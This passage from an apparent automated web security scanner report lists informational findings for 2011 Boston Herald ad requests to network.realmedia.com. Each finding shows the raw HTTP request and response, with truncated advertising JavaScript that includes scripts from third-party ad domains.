Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O8016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:27:11 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5l|O10M5x|O10M62|O10M69|O1012Mr|O1016F7|O9016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:18:14 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.260. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O1012Mr|O1016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:41 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.261. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1068587247@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fpolitics%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O1012Mr|O1016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:46 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1012Mr|O2016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0e45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:48 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.262. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:03 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O1012Mr|O3016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0c45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:06 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.263. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1089179764@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Right,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Fnews%2Fregional%2Farticle
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O1012Mr|O2016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:42 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:45 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.264. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiQmF81012Mr|O1016GB; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:57:37 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O1016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:48:40 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.265. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1104028281@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,x14,x15,x16,Middle,Middle1,Middle2,Bottom&page=bh.heraldinteractive.com%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; mm247=AL0LE0AS0SE0CA0OP0DO0CR0BR0CO0MO0PE0PR0PU0SP0SU0DI0EX0OM0DY0RS0; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; SData=,D41D8CD98F00B204E9800998ECF8427E; RMFD=011PiQmF81012Mr|O1016GB; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0f45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:39 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.266. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 21:58:09 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O4016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3623
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 13:49:11 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag="></script>
...[SNIP]...

18.267. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1105447520@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5l|O1012Mr|O3016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:44:43 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0d45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 17:35:45 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.268. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1210886297@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1; RMFD=011PiwK1O10IxS|O10M5V|O10M5b|O10M5d|O10M5i|O10M5l|O10M5p|O10M5x|O10M62|O10M69|O1012Mr|O2016F7|OA016Of

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:39:44 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1013
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09499e0a45525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 22:40:44 GMT;path=/

document.write ('<script language="JavaScript">\n');
document.write ('var zflag_nid="951"; var zflag_cid="2"; var zflag_sid="2"; var zflag_width="728"; var zflag_height="90"; var zflag_sz="14"; var zf
...[SNIP]...
</script>\n');
document.write ('<script language="JavaScript" src="http://d3.zedo.com/jsc/d3/fo.js"></script>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://syndication.mmismm.com/mmtnt.php">\n');
document.write ('</script><script type="text/javascript" src="http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L12&mm_flag="></script>
...[SNIP]...

18.269. http://network.realmedia.com/RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://network.realmedia.com
Path:   /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1

Issue detail

The response dynamically includes the following scripts from other domains (as visible in the truncated response below):

http://syndication.mmismm.com/mmtnt.php
http://tcla.mmismm.com/mmmss.php?mm_pub=87268797280&mm_pub_channel=bostonherald/ros/728x90/jx/ss/a/L31&mm_flag=

Request

GET /RealMedia/ads/adstream_jx.ads/bostonherald/ros/728x90/jx/ss/a/1452948432@Top1 HTTP/1.1
Host: network.realmedia.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Bottom&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800pDrcAAovp; S247=399NOVvW2dQZCsJ5oXW9zK_qWmZqqKZlVqCOOX-807ztLojTU5W5ayQ; S247S=1; RMFL=011PiXH1U10EfJ|U10Eo1|U1014lt|U10166E; NXCLICK2=011PiXHRNX_!yNX_TRACK_Askcom"/Retargeting_Homepage_Nonsecure!y; SData=,D41D8CD98F00B204E9800998ECF8427E; SDataR=1; RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O6016Of; mm247=AL1LE0AS1SE1CA5OP5DO0CR0BR0CO0MO1PE0PR0PU0SP0SU5DI1EX1OM0DY0RS1

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 22:18:57 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: RMFD=011PiwK1O10IxS|O10M5V|O10M5d|O10M5l|O10M5x|O10M69|O1012Mr|O1016F7|O7016Of; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.realmedia.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3622
Content-Type: application/x-javascript
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e0845525d5f4f58455e445a4a423660;expires=Fri, 28-Jan-2011 14:10:00 GMT;path=/

document.write ('<script type="text/javascript">\n');
document.write ('function pr_swfver(){\n');
document.write ('var osf,osfd,i,axo=1,v=0,nv=navigator;\n');
document.write ('if(nv.plugins&&nv.mimeTy
...[SNIP]...
</script>\n');
